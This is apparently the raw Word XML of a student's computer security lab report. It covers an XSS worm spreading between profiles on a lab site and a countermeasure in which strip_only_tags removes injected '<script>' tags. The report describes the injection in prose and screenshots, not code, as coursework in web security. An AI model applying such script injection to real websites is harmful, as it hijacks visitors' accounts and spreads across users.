    <w:p w14:paraId="7367854D" w14:textId="037D3322" w:rsidR="001E18EF" w:rsidRDefault="00F21DF6" w:rsidP="001E18EF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D4223CA" wp14:editId="3CB4E9E1">
            <wp:extent cx="5266055" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Picture 35" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.26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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.26.3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6362" w14:textId="2CB982EE" w:rsidR="00F21DF6" w:rsidRDefault="00F21DF6" w:rsidP="001E18EF">
      <w:r>
        <w:t xml:space="preserve">It means </w:t>
      </w:r>
      <w:r w:rsidR="00DA6FDA">
        <w:t>alice</w:t>
      </w:r>
      <w:r w:rsidR="00C94EF7">
        <w:t>’s profile now run the JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00142BBD">
        <w:t>, it</w:t>
      </w:r>
      <w:r w:rsidR="00DA6FDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B60375">
        <w:t>also</w:t>
      </w:r>
      <w:r w:rsidR="00DA6FDA">
        <w:t xml:space="preserve"> has the ability to affect</w:t>
      </w:r>
      <w:r w:rsidR="00306009">
        <w:t xml:space="preserve"> other file</w:t>
      </w:r>
      <w:r w:rsidR="00151D96">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0025099E" w:rsidRPr="0025099E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0025099E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CB22762" wp14:editId="799D9066">
            <wp:extent cx="5266055" cy="3810000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="Picture 36" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.2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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.27.2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9467" w14:textId="799BBAE0" w:rsidR="002A136C" w:rsidRDefault="002A136C" w:rsidP="001E18EF"/>
    <w:p w14:paraId="35E19E31" w14:textId="4A612628" w:rsidR="00151D96" w:rsidRDefault="00151D96" w:rsidP="001E18EF">
      <w:r>
        <w:t xml:space="preserve">But as we put check in </w:t>
      </w:r>
      <w:r w:rsidR="00BB341F">
        <w:t xml:space="preserve">JavaScript, so the worm would not affect </w:t>
      </w:r>
      <w:r w:rsidR="000F248E">
        <w:t>visitor’s own</w:t>
      </w:r>
      <w:r w:rsidR="00BB341F">
        <w:t xml:space="preserve"> profile</w:t>
      </w:r>
      <w:r w:rsidR="00E748A6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18018833" w14:textId="571FC0C1" w:rsidR="00A87E4D" w:rsidRDefault="00A87E4D" w:rsidP="001E18EF">
      <w:r>
        <w:t>Now login as bob, and visit</w:t>
      </w:r>
      <w:r w:rsidR="00026EFE">
        <w:t xml:space="preserve"> alice</w:t>
      </w:r>
      <w:r w:rsidR="00992397">
        <w:t>’s profile</w:t>
      </w:r>
      <w:r w:rsidR="005F15D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D11210B" wp14:editId="7AACED7D">
            <wp:extent cx="5266055" cy="2861945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="39" name="Picture 39" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.28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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.28.31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56D1" w14:textId="42CDDF26" w:rsidR="00DA541A" w:rsidRDefault="004508B8" w:rsidP="001E18EF">
      <w:r>
        <w:t>And B</w:t>
      </w:r>
      <w:r w:rsidR="00DA541A">
        <w:t>ob also get affected by the XSS worm</w:t>
      </w:r>
      <w:r w:rsidR="00032236">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004508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7A4E9" wp14:editId="454E6D8A">
            <wp:extent cx="5266055" cy="3835400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Picture 40" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.29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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.29.00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D5C1" w14:textId="06C595A1" w:rsidR="00032236" w:rsidRDefault="00032236" w:rsidP="001E18EF"/>
    <w:p w14:paraId="6571C0CC" w14:textId="57FE4C9E" w:rsidR="001E18EF" w:rsidRDefault="001E18EF" w:rsidP="001E18EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc183098922"/>
      <w:r>
        <w:t>Task 7: Countermeasures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="49AD7C76" w14:textId="39F45A74" w:rsidR="00372D78" w:rsidRDefault="00372D78" w:rsidP="00372D78">
      <w:r>
        <w:t>Change back the</w:t>
      </w:r>
      <w:r w:rsidR="007C7FB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00194B46" w:rsidRPr="00194B46">
        <w:t>getArrayVal()</w:t>
      </w:r>
      <w:r w:rsidR="00194B46">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00194B46" w:rsidRPr="00194B46">
        <w:t>include/initfunctions.php</w:t>
      </w:r>
      <w:r w:rsidR="008D3F4E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C8785" w14:textId="7480D431" w:rsidR="00372D78" w:rsidRDefault="00114C1F" w:rsidP="00372D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43AD2396" wp14:editId="663A2D1A">
            <wp:extent cx="4114800" cy="1998107"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="41" name="Picture 41" descr="Macintosh HD:Users:Ider:Desktop:Screen Shot 2011-11-16 at 9.2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Ider:Desktop:Screen Shot 2011-11-16 at 9.21.28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7C43" w14:textId="559AB228" w:rsidR="00B5085B" w:rsidRDefault="003F1107" w:rsidP="00372D78">
      <w:r>
        <w:t>And now, we login as peter, and put “&lt;script&gt;” tag in company field, and link to the JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="0014179C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000A04E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F6DF16" wp14:editId="0F02BD80">
            <wp:extent cx="4745787" cy="2044700"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="43" name="Picture 43" descr="Macintosh HD:Users:Ider:Desktop:Screen Shot 2011-11-16 at 9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Ider:Desktop:Screen Shot 2011-11-16 at 9.33.02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87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C77F" w14:textId="41BD09DE" w:rsidR="00F82942" w:rsidRDefault="000A04E6" w:rsidP="00372D78">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>There is no value in the company filed, looks like we still embed the script</w:t>
      </w:r>
      <w:r w:rsidR="00F82942">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F82942" w:rsidRPr="00F82942">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F82942">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653EB5E2" wp14:editId="6C31F277">
            <wp:extent cx="4457700" cy="2436604"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="44" name="Picture 44" descr="Macintosh HD:Users:Ider:Desktop:Screen Shot 2011-11-16 at 9.33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Ider:Desktop:Screen Shot 2011-11-16 at 9.33.1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0AD8" w14:textId="32E5D446" w:rsidR="00B21F5B" w:rsidRDefault="00B21F5B" w:rsidP="00372D78">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>But no name information popup, this is weird,</w:t>
      </w:r>
      <w:r w:rsidR="003426A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> any if we open editing panel,</w:t>
      </w:r>
      <w:r w:rsidR="001C104C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> we could see that company field is empty</w:t>
      </w:r>
      <w:r w:rsidR="00743C72">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">, we did not has the </w:t>
      </w:r>
      <w:r w:rsidR="00D21E62">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>script embeded to the profile</w:t>
      </w:r>
      <w:r w:rsidR="00596728">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C5F32" w14:textId="38360770" w:rsidR="007D79FF" w:rsidRDefault="0085470C" w:rsidP="00372D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76993BBD" wp14:editId="1F4C1ED5">
            <wp:extent cx="4357092" cy="1989667"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="45" name="Picture 45" descr="Macintosh HD:Users:Ider:Desktop:Screen Shot 2011-11-16 at 9.33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Ider:Desktop:Screen Shot 2011-11-16 at 9.33.22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92" cy="19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DB87" w14:textId="597AA1EF" w:rsidR="007B0A8B" w:rsidRDefault="0001636C" w:rsidP="00372D78">
      <w:r>
        <w:t>The reason is</w:t>
      </w:r>
      <w:r w:rsidR="006C48DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C48DC" w:rsidRPr="006C48DC">
        <w:t>strip_only_tags</w:t>
      </w:r>
      <w:r w:rsidR="006C48DC">
        <w:t xml:space="preserve"> function will get rid of specified HTML tag, in this system, it remove the “&lt;script&gt;” tag. Since we could not embed script, the JavaScript could not be run in the profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A32A23" w14:textId="40C4C56A" w:rsidR="007B0A8B" w:rsidRDefault="00315A78" w:rsidP="00372D78">
      <w:r>
        <w:t>And because we have</w:t>
      </w:r>
      <w:r w:rsidR="007B0A8B">
        <w:t xml:space="preserve"> no seed of worm, we also could not spread the worm to affect other profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A4864" w14:textId="2212506B" w:rsidR="00315A78" w:rsidRPr="00372D78" w:rsidRDefault="00965A5E" w:rsidP="00372D78">
      <w:r>
        <w:t>So the</w:t>
      </w:r>
      <w:r w:rsidR="00792739">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0050065C">
        <w:t>Countermeasure</w:t>
      </w:r>
      <w:r w:rsidR="00792739">
        <w:t xml:space="preserve"> works successfully.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00315A78" w:rsidRPr="00372D78" w:rsidSect="00331556">
      <w:headerReference w:type="default" r:id="rId38"/>
      <w:footerReference w:type="default" r:id="rId3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0229" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380C" w:rsidP="00D32C64">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6CA56515" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380C" w:rsidP="00D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imbusRomNo9L-Regu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2526" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380C" w:rsidP="00D32C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05C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BA71" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380C" w:rsidP="00D32C64">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="640142AC" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C380C" w:rsidP="00D32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258"/>
      <w:gridCol w:w="4258"/>
    </w:tblGrid>
    <w:tr w:rsidR="008C380C" w14:paraId="60593F93" w14:textId="77777777" w:rsidTr="00227C9C">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4258" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="166923FF" w14:textId="2D559A6E" w:rsidR="008C380C" w:rsidRPr="009E7FD1" w:rsidRDefault="008C380C" w:rsidP="00DE05CA">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="4320"/>
              <w:tab w:val="clear" w:pos="8640"/>
            </w:tabs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hAnsi="Courier"/>
            </w:rPr>
            <w:t xml:space="preserve">Computer Security Lab </w:t>
          </w:r>
          <w:r w:rsidR="00DE05CA">
            <w:rPr>
              <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
            </w:rPr>
            <w:t>9</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4258" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="5A96A588" w14:textId="77777777" w:rsidR="008C380C" w:rsidRPr="009E7FD1" w:rsidRDefault="008C380C" w:rsidP="00227C9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eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Jian Zheng</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve"> 716188082</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5AE8DD31" w14:textId="77777777" w:rsidR="008C380C" w:rsidRDefault="008C3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4"/>
    <w:rsid w:val="00012DDB"/>
    <w:rsid w:val="0001479C"/>
    <w:rsid w:val="0001636C"/>
    <w:rsid w:val="00026EFE"/>
    <w:rsid w:val="00032236"/>
    <w:rsid w:val="00037901"/>
    <w:rsid w:val="000503DF"/>
    <w:rsid w:val="00053D10"/>
    <w:rsid w:val="00054A02"/>
    <w:rsid w:val="0005637E"/>
    <w:rsid w:val="00061224"/>
    <w:rsid w:val="00062550"/>
    <w:rsid w:val="00071314"/>
    <w:rsid w:val="00072EAF"/>
    <w:rsid w:val="000733C1"/>
    <w:rsid w:val="000749AD"/>
    <w:rsid w:val="00080EC4"/>
    <w:rsid w:val="00084766"/>
    <w:rsid w:val="000A04E6"/>
    <w:rsid w:val="000A319F"/>
    <w:rsid w:val="000A7CF1"/>
    <w:rsid w:val="000B0062"/>
    <w:rsid w:val="000B1926"/>
    <w:rsid w:val="000C7824"/>
    <w:rsid w:val="000D39E1"/>
    <w:rsid w:val="000D76BC"/>
    <w:rsid w:val="000E36EA"/>
    <w:rsid w:val="000E3AE9"/>
    <w:rsid w:val="000F248E"/>
    <w:rsid w:val="000F29D2"/>
    <w:rsid w:val="00103C69"/>
    <w:rsid w:val="001052AC"/>
    <w:rsid w:val="00114C1F"/>
    <w:rsid w:val="00131AFC"/>
    <w:rsid w:val="0013430D"/>
    <w:rsid w:val="0014179C"/>
    <w:rsid w:val="00142BBD"/>
    <w:rsid w:val="00145035"/>
    <w:rsid w:val="00145131"/>
    <w:rsid w:val="00150713"/>
    <w:rsid w:val="00151D96"/>
    <w:rsid w:val="001524C0"/>
    <w:rsid w:val="00156EEE"/>
    <w:rsid w:val="00167A33"/>
    <w:rsid w:val="00180AF3"/>
    <w:rsid w:val="0018550E"/>
    <w:rsid w:val="00194B46"/>
    <w:rsid w:val="00194D56"/>
    <w:rsid w:val="001965F7"/>
    <w:rsid w:val="001A2AAB"/>
    <w:rsid w:val="001A3F9F"/>
    <w:rsid w:val="001B78E5"/>
    <w:rsid w:val="001C104C"/>
    <w:rsid w:val="001C3F63"/>
    <w:rsid w:val="001D243D"/>
    <w:rsid w:val="001E18EF"/>
    <w:rsid w:val="001E1A7A"/>
    <w:rsid w:val="001E2453"/>
    <w:rsid w:val="001F0D9B"/>
    <w:rsid w:val="001F1BB0"/>
    <w:rsid w:val="001F25F6"/>
    <w:rsid w:val="001F7E89"/>
    <w:rsid w:val="00201A88"/>
    <w:rsid w:val="00217BAE"/>
    <w:rsid w:val="002201D6"/>
    <w:rsid w:val="00220E3C"/>
    <w:rsid w:val="002247C5"/>
    <w:rsid w:val="00227C9C"/>
    <w:rsid w:val="00232094"/>
    <w:rsid w:val="00240059"/>
    <w:rsid w:val="002404D5"/>
    <w:rsid w:val="00241D56"/>
    <w:rsid w:val="00245D6B"/>
    <w:rsid w:val="0025099E"/>
    <w:rsid w:val="00252AE3"/>
    <w:rsid w:val="00254D54"/>
    <w:rsid w:val="00260D0A"/>
    <w:rsid w:val="002639F4"/>
    <w:rsid w:val="002676E9"/>
    <w:rsid w:val="00270FA9"/>
    <w:rsid w:val="00275294"/>
    <w:rsid w:val="002822F1"/>
    <w:rsid w:val="00291F46"/>
    <w:rsid w:val="00294224"/>
    <w:rsid w:val="002A1056"/>
    <w:rsid w:val="002A136C"/>
    <w:rsid w:val="002A5D8E"/>
    <w:rsid w:val="002C0CFA"/>
    <w:rsid w:val="002D11B0"/>
    <w:rsid w:val="002E1CB1"/>
    <w:rsid w:val="002E47FD"/>
    <w:rsid w:val="00306009"/>
    <w:rsid w:val="00315A78"/>
    <w:rsid w:val="00327B3B"/>
    <w:rsid w:val="00330FA8"/>
    <w:rsid w:val="00331556"/>
    <w:rsid w:val="003426A4"/>
    <w:rsid w:val="00353446"/>
    <w:rsid w:val="003548FB"/>
    <w:rsid w:val="00356F95"/>
    <w:rsid w:val="00372D78"/>
    <w:rsid w:val="00376997"/>
    <w:rsid w:val="003816D7"/>
    <w:rsid w:val="003968F9"/>
    <w:rsid w:val="003C088F"/>
    <w:rsid w:val="003C1731"/>
    <w:rsid w:val="003C345C"/>
    <w:rsid w:val="003D313D"/>
    <w:rsid w:val="003D4119"/>
    <w:rsid w:val="003E2E22"/>
    <w:rsid w:val="003E3C86"/>
    <w:rsid w:val="003E6E05"/>
    <w:rsid w:val="003E72B5"/>
    <w:rsid w:val="003F1107"/>
    <w:rsid w:val="003F542D"/>
    <w:rsid w:val="003F5AFE"/>
    <w:rsid w:val="00400E79"/>
    <w:rsid w:val="004048C4"/>
    <w:rsid w:val="004071F6"/>
    <w:rsid w:val="004328D0"/>
    <w:rsid w:val="00436492"/>
    <w:rsid w:val="00437035"/>
    <w:rsid w:val="00441B3F"/>
    <w:rsid w:val="00443261"/>
    <w:rsid w:val="0045033A"/>
    <w:rsid w:val="004508B8"/>
    <w:rsid w:val="00464479"/>
    <w:rsid w:val="0046775F"/>
    <w:rsid w:val="004702E7"/>
    <w:rsid w:val="0047159C"/>
    <w:rsid w:val="00473722"/>
    <w:rsid w:val="00476E3F"/>
    <w:rsid w:val="00477952"/>
    <w:rsid w:val="004825D5"/>
    <w:rsid w:val="004932EC"/>
    <w:rsid w:val="004961E5"/>
    <w:rsid w:val="004A0468"/>
    <w:rsid w:val="004A156B"/>
    <w:rsid w:val="004A1642"/>
    <w:rsid w:val="004A4D3C"/>
    <w:rsid w:val="004C05DB"/>
    <w:rsid w:val="004D42CA"/>
    <w:rsid w:val="0050065C"/>
    <w:rsid w:val="00510E90"/>
    <w:rsid w:val="00537518"/>
    <w:rsid w:val="005404D3"/>
    <w:rsid w:val="00544DD0"/>
    <w:rsid w:val="00556805"/>
    <w:rsid w:val="00585FA5"/>
    <w:rsid w:val="00596728"/>
    <w:rsid w:val="0059740C"/>
    <w:rsid w:val="005A5603"/>
    <w:rsid w:val="005B1BC0"/>
    <w:rsid w:val="005B55EB"/>
    <w:rsid w:val="005D6CFC"/>
    <w:rsid w:val="005E6DBA"/>
    <w:rsid w:val="005E7F8B"/>
    <w:rsid w:val="005F15D5"/>
    <w:rsid w:val="005F257E"/>
    <w:rsid w:val="006028A6"/>
    <w:rsid w:val="00613B3B"/>
    <w:rsid w:val="00620430"/>
    <w:rsid w:val="00620F01"/>
    <w:rsid w:val="00631B30"/>
    <w:rsid w:val="006336A2"/>
    <w:rsid w:val="00670CD0"/>
    <w:rsid w:val="00685D9A"/>
    <w:rsid w:val="00693790"/>
    <w:rsid w:val="006A2814"/>
    <w:rsid w:val="006A32E8"/>
    <w:rsid w:val="006A3ABD"/>
    <w:rsid w:val="006A4C5E"/>
    <w:rsid w:val="006A642D"/>
    <w:rsid w:val="006B221A"/>
    <w:rsid w:val="006B2E54"/>
    <w:rsid w:val="006B3179"/>
    <w:rsid w:val="006B60B0"/>
    <w:rsid w:val="006B6BA8"/>
    <w:rsid w:val="006C48DC"/>
    <w:rsid w:val="006C6179"/>
    <w:rsid w:val="006C65F4"/>
    <w:rsid w:val="006D2386"/>
    <w:rsid w:val="006D6D0E"/>
    <w:rsid w:val="006E17E7"/>
    <w:rsid w:val="006F4206"/>
    <w:rsid w:val="0070529E"/>
    <w:rsid w:val="00705330"/>
    <w:rsid w:val="0072440C"/>
    <w:rsid w:val="007279A4"/>
    <w:rsid w:val="00730437"/>
    <w:rsid w:val="00730A70"/>
    <w:rsid w:val="0073232A"/>
    <w:rsid w:val="00743C72"/>
    <w:rsid w:val="00756460"/>
    <w:rsid w:val="007610BB"/>
    <w:rsid w:val="00761621"/>
    <w:rsid w:val="00767AD2"/>
    <w:rsid w:val="00792739"/>
    <w:rsid w:val="007B0A8B"/>
    <w:rsid w:val="007B14E5"/>
    <w:rsid w:val="007B642F"/>
    <w:rsid w:val="007B73A4"/>
    <w:rsid w:val="007C3988"/>
    <w:rsid w:val="007C7051"/>
    <w:rsid w:val="007C7FB3"/>
    <w:rsid w:val="007D79FF"/>
    <w:rsid w:val="007E0199"/>
    <w:rsid w:val="007E19FB"/>
    <w:rsid w:val="007F21DC"/>
    <w:rsid w:val="008017B2"/>
    <w:rsid w:val="008056CB"/>
    <w:rsid w:val="008062F8"/>
    <w:rsid w:val="008074EF"/>
    <w:rsid w:val="00810671"/>
    <w:rsid w:val="00811549"/>
    <w:rsid w:val="00812446"/>
    <w:rsid w:val="008278B4"/>
    <w:rsid w:val="0083133F"/>
    <w:rsid w:val="00836C94"/>
    <w:rsid w:val="00844F8B"/>
    <w:rsid w:val="0085470C"/>
    <w:rsid w:val="00860B19"/>
    <w:rsid w:val="00861B85"/>
    <w:rsid w:val="0086221D"/>
    <w:rsid w:val="00865CD1"/>
    <w:rsid w:val="00866E2F"/>
    <w:rsid w:val="008676E2"/>
    <w:rsid w:val="00873FD5"/>
    <w:rsid w:val="008867F8"/>
    <w:rsid w:val="0089660E"/>
    <w:rsid w:val="00897CAF"/>
    <w:rsid w:val="008A50E6"/>
    <w:rsid w:val="008A5671"/>
    <w:rsid w:val="008A6A44"/>
    <w:rsid w:val="008B2284"/>
    <w:rsid w:val="008C380C"/>
    <w:rsid w:val="008D3F4E"/>
    <w:rsid w:val="008E1068"/>
    <w:rsid w:val="008F4D18"/>
    <w:rsid w:val="0090017E"/>
    <w:rsid w:val="009156BD"/>
    <w:rsid w:val="00920AE7"/>
    <w:rsid w:val="0092125B"/>
    <w:rsid w:val="00923384"/>
    <w:rsid w:val="0093377D"/>
    <w:rsid w:val="00936143"/>
    <w:rsid w:val="00940968"/>
    <w:rsid w:val="00953F5C"/>
    <w:rsid w:val="00965A5E"/>
    <w:rsid w:val="0097482B"/>
    <w:rsid w:val="009759CF"/>
    <w:rsid w:val="00985292"/>
    <w:rsid w:val="00992397"/>
    <w:rsid w:val="00992E0F"/>
    <w:rsid w:val="009B2CA8"/>
    <w:rsid w:val="009D278A"/>
    <w:rsid w:val="009D58A2"/>
    <w:rsid w:val="009E2CDF"/>
    <w:rsid w:val="009F1A39"/>
    <w:rsid w:val="00A144A9"/>
    <w:rsid w:val="00A32E3C"/>
    <w:rsid w:val="00A5487A"/>
    <w:rsid w:val="00A61323"/>
    <w:rsid w:val="00A66569"/>
    <w:rsid w:val="00A66F74"/>
    <w:rsid w:val="00A82B41"/>
    <w:rsid w:val="00A8351E"/>
    <w:rsid w:val="00A87E4D"/>
    <w:rsid w:val="00A928AA"/>
    <w:rsid w:val="00A9384C"/>
    <w:rsid w:val="00A965E8"/>
    <w:rsid w:val="00AA12B4"/>
    <w:rsid w:val="00AA52D4"/>
    <w:rsid w:val="00AA79FF"/>
    <w:rsid w:val="00AC271D"/>
    <w:rsid w:val="00AD39E3"/>
    <w:rsid w:val="00AD41D8"/>
    <w:rsid w:val="00AD6E6E"/>
    <w:rsid w:val="00AE2FAE"/>
    <w:rsid w:val="00B21F5B"/>
    <w:rsid w:val="00B22574"/>
    <w:rsid w:val="00B2757A"/>
    <w:rsid w:val="00B37F4E"/>
    <w:rsid w:val="00B5085B"/>
    <w:rsid w:val="00B60375"/>
    <w:rsid w:val="00B941AD"/>
    <w:rsid w:val="00B94F64"/>
    <w:rsid w:val="00B963B1"/>
    <w:rsid w:val="00BA4453"/>
    <w:rsid w:val="00BA51E4"/>
    <w:rsid w:val="00BB341F"/>
    <w:rsid w:val="00BC33B6"/>
    <w:rsid w:val="00BC436E"/>
    <w:rsid w:val="00BC6C1D"/>
    <w:rsid w:val="00BD05CB"/>
    <w:rsid w:val="00BD258E"/>
    <w:rsid w:val="00BD273C"/>
    <w:rsid w:val="00BD563B"/>
    <w:rsid w:val="00BF4D98"/>
    <w:rsid w:val="00BF6736"/>
    <w:rsid w:val="00C0088B"/>
    <w:rsid w:val="00C032BD"/>
    <w:rsid w:val="00C05C58"/>
    <w:rsid w:val="00C16A49"/>
    <w:rsid w:val="00C17B32"/>
    <w:rsid w:val="00C30F64"/>
    <w:rsid w:val="00C31B15"/>
    <w:rsid w:val="00C320C9"/>
    <w:rsid w:val="00C3284E"/>
    <w:rsid w:val="00C41FF2"/>
    <w:rsid w:val="00C47D2E"/>
    <w:rsid w:val="00C6482B"/>
    <w:rsid w:val="00C71774"/>
    <w:rsid w:val="00C762FE"/>
    <w:rsid w:val="00C77832"/>
    <w:rsid w:val="00C940C0"/>
    <w:rsid w:val="00C94EF7"/>
    <w:rsid w:val="00CA00AE"/>
    <w:rsid w:val="00CE1827"/>
    <w:rsid w:val="00CE56F8"/>
    <w:rsid w:val="00CF4513"/>
    <w:rsid w:val="00CF60B4"/>
    <w:rsid w:val="00D07BE6"/>
    <w:rsid w:val="00D21920"/>
    <w:rsid w:val="00D21E62"/>
    <w:rsid w:val="00D32C64"/>
    <w:rsid w:val="00D34B8C"/>
    <w:rsid w:val="00D4036A"/>
    <w:rsid w:val="00D56A74"/>
    <w:rsid w:val="00D56F7F"/>
    <w:rsid w:val="00D605A6"/>
    <w:rsid w:val="00D61F5D"/>
    <w:rsid w:val="00D70725"/>
    <w:rsid w:val="00D93449"/>
    <w:rsid w:val="00D939F1"/>
    <w:rsid w:val="00D93F49"/>
    <w:rsid w:val="00DA541A"/>
    <w:rsid w:val="00DA6FDA"/>
    <w:rsid w:val="00DB70FD"/>
    <w:rsid w:val="00DC0179"/>
    <w:rsid w:val="00DC47EA"/>
    <w:rsid w:val="00DD3D86"/>
    <w:rsid w:val="00DD3EBB"/>
    <w:rsid w:val="00DD4655"/>
    <w:rsid w:val="00DE05CA"/>
    <w:rsid w:val="00DE1C37"/>
    <w:rsid w:val="00DE390B"/>
    <w:rsid w:val="00DE40A4"/>
    <w:rsid w:val="00DF19B9"/>
    <w:rsid w:val="00E0067B"/>
    <w:rsid w:val="00E1196A"/>
    <w:rsid w:val="00E13772"/>
    <w:rsid w:val="00E16882"/>
    <w:rsid w:val="00E31B91"/>
    <w:rsid w:val="00E414D8"/>
    <w:rsid w:val="00E429E7"/>
    <w:rsid w:val="00E451B9"/>
    <w:rsid w:val="00E622E0"/>
    <w:rsid w:val="00E748A6"/>
    <w:rsid w:val="00E93805"/>
    <w:rsid w:val="00E95C16"/>
    <w:rsid w:val="00EB1560"/>
    <w:rsid w:val="00EB2B17"/>
    <w:rsid w:val="00EC0AAA"/>
    <w:rsid w:val="00EC66EB"/>
    <w:rsid w:val="00ED38ED"/>
    <w:rsid w:val="00ED7AA9"/>
    <w:rsid w:val="00EE0C04"/>
    <w:rsid w:val="00EE18E7"/>
    <w:rsid w:val="00EE4857"/>
    <w:rsid w:val="00EE7E4F"/>
    <w:rsid w:val="00EF3594"/>
    <w:rsid w:val="00EF738C"/>
    <w:rsid w:val="00F1588B"/>
    <w:rsid w:val="00F15CE3"/>
    <w:rsid w:val="00F20488"/>
    <w:rsid w:val="00F21DF6"/>
    <w:rsid w:val="00F22FEF"/>
    <w:rsid w:val="00F338E4"/>
    <w:rsid w:val="00F41FD3"/>
    <w:rsid w:val="00F44C7F"/>
    <w:rsid w:val="00F54070"/>
    <w:rsid w:val="00F647EB"/>
    <w:rsid w:val="00F67674"/>
    <w:rsid w:val="00F71C24"/>
    <w:rsid w:val="00F72336"/>
    <w:rsid w:val="00F77B31"/>
    <w:rsid w:val="00F806B6"/>
